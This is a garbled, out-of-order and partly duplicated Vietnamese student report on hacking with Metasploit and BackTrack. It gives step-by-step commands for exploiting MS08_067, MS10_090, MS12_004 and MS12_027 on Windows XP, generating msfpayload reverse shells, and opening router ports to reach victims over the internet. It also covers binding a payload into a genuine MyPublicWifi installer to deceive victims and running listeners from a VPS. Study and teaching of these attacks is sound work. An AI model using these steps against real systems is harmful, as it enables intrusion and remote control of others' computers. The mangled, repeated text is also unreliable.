Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
